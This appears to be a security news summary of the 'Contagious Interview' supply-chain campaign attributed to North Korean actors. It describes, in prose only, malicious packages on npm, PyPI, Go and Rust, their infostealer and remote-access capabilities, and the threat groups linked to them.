North Korean-linked threat actors have significantly expanded their cyber operations, distributing over 1,700 malicious packages across popular software repositories including npm, PyPI, Go, and Rust. The campaign, dubbed "Contagious Interview," aims to infiltrate developer environments through sophisticated supply chain attacks, posing a substantial risk to software integrity and user data.

Key Takeaways

• Over 1,700 malicious packages identified across npm, PyPI, Go, Rust, and Packagist.

• Packages impersonate legitimate developer tools to act as malware loaders.

• Malware capabilities include infostealing, remote access, and extensive post-compromise actions.

• The campaign is attributed to financially motivated North Korean actors, overlapping with groups like UNC1069 and BlueNoroff.

A Coordinated Cross-Ecosystem Attack

The "Contagious Interview" campaign has evolved its tactics by targeting multiple open-source ecosystems. Malicious packages were designed to mimic legitimate developer tools, such as logging and debugging utilities, making them less likely to arouse suspicion. These packages function as malware loaders, designed to fetch and execute second-stage payloads.

Sophisticated Malware and Post-Compromise Functionality

The payloads delivered by these malicious packages possess infostealer and Remote Access Trojan (RAT) capabilities. They primarily focus on exfiltrating sensitive data from web browsers, password managers, and cryptocurrency wallets. Notably, a Windows version of the malware, delivered via the "license-utils-kit" package, includes a comprehensive post-compromise implant. This implant can execute shell commands, log keystrokes, steal browser data, upload files, terminate browsers, deploy AnyDesk for remote access, create encrypted archives, and download additional modules.

Stealthy Infection Methods

A key aspect of this campaign's sophistication lies in how the malicious code is triggered. Instead of activating during installation, the malware is embedded within seemingly legitimate functions that align with the package's advertised purpose. For instance, in the "logtrace" Rust package, the malicious code is hidden within a method named "Logger::trace(i32)," making it extremely difficult for developers to detect during routine use or debugging.

Broader North Korean Cyber Operations

This discovery is part of a larger pattern of software supply chain compromises attributed to North Korean hacking groups. These operations often involve poisoning popular packages or compromising maintainer accounts through social engineering. The financially motivated threat actor UNC1069, which overlaps with groups like BlueNoroff, Sapphire Sleet, and Stardust Chollima, is believed to be behind this activity. Security firms have reported blocking numerous UNC1069-linked domains impersonating services like Microsoft Teams and Zoom, often using multi-week social engineering campaigns to deliver malware.

Sources

• N. Korean Hackers Spread 1,700 Malicious Packages Across npm, PyPI, Go, Rust, The Hacker News.

• North Korea: 1,700 malicious Npm, PyPI, Go, Rust packages, SecNews.gr.